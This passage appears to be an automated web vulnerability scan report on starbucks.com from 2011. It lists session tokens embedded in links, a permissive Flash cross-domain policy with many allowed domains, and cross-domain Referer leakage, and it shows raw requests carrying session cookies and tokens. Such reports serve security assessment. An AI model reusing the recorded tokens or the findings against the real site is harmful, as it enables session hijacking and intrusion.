HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:52 GMT
Connection: close
Content-Length: 39059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

3.3. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/privacy-statement

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /about-us/company-information/online-policies/privacy-statement HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:11 GMT
Connection: close
Content-Length: 52740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

3.4. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/terms-of-use

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /about-us/company-information/online-policies/terms-of-use HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:20 GMT
Connection: close
Content-Length: 68702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

3.5. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/web-accessibility

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /about-us/company-information/online-policies/web-accessibility HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:55 GMT
Connection: close
Content-Length: 39158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

3.6. http://www.starbucks.com/about-us/company-information/product-advisories  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /about-us/company-information/product-advisories

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /about-us/company-information/product-advisories HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:53 GMT
Connection: close
Content-Length: 38316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

3.7. http://www.starbucks.com/about-us/our-heritage  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /about-us/our-heritage

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /about-us/our-heritage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:47 GMT
Connection: close
Content-Length: 37409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

3.8. http://www.starbucks.com/site-map  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /site-map

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /site-map HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:21 GMT
Connection: close
Content-Length: 92706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

4. Flash cross-domain policy  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.starbucks.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 06 Dec 2010 21:05:34 GMT
Accept-Ranges: bytes
ETag: "1bcfd5528995cb1:0"
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:02:26 GMT
Connection: close
Content-Length: 2004

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.starbucks.com" />
   <allow-access-from domain="*.starbucks.net" />
   <allow-access-from domain="*.brightcove.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.plymedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.subply.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sbweb.prod" />
   <allow-access-from domain="localhost" />
   <allow-access-from domain="*.tazo.com" />
   <allow-access-from domain="dev101.zaaz.com" />

   <allow-access-from domain="*.zaaz.com" />
   <allow-access-from domain="66.150.7.162" />
   <allow-access-from domain="216.26.171.116" />
   <allow-access-from domain="216.70.126.141" />
   <allow-access-from domain="216.128.18.110" />
   <allow-access-from domain="v027u06pye.maximumasp.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.hearmusic.com" />
   <allow-access-from domain="*.starbucksentertainment.com" />
...[SNIP]...
<allow-access-from domain="*.bbc.co.uk" />
   <allow-access-from domain="*.facebook.ca" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="*.macleans.ca" />
   <allow-access-from domain="*.msn.ca" />
   <allow-access-from domain="*.msn.com" />
   <allow-access-from domain="*.dartmotif.com" />
   <allow-access-from domain="*.2mdn.net" />

   <allow-access-from domain="*.doubleclick.net" />
   <allow-access-from domain="*.doubleclick.com" />
   <allow-access-from domain="*.adcdn.com" />
   <allow-access-from domain="*.starbucks.ca" />
   <allow-access-from domain="*.straight.com" />
   <allow-access-from domain="*.theglobeandmail.com" />
   <allow-access-from domain="*.yahoo.ca" />
   <allow-access-from domain="*.yahoo.com" />
...[SNIP]...

5. Cross-domain Referer leakage  previous  next
There are 5 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. http://www.starbucks.com/menu/catalog/nutrition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/catalog/nutrition

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /menu/catalog/nutrition?food=all&wellness=high-fiber HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:04:14 GMT
Connection: close
Content-Length: 50715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<p>We would love to hear your suggestions at <a href="http://mystarbucksidea.force.com/">MyStarbucksIdea.com.</a>
...[SNIP]...
</span>
   <a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/menu/catalog/nutrition?food=all&wellness=high-fiber" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbucks.cl">Chile</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...

5.2. http://www.starbucks.com/menu/catalog/nutrition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/catalog/nutrition

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /menu/catalog/nutrition?drink=bottled-drinks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:03:53 GMT
Connection: close
Content-Length: 44711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</span>
   <a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/menu/catalog/nutrition?drink=bottled-drinks" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
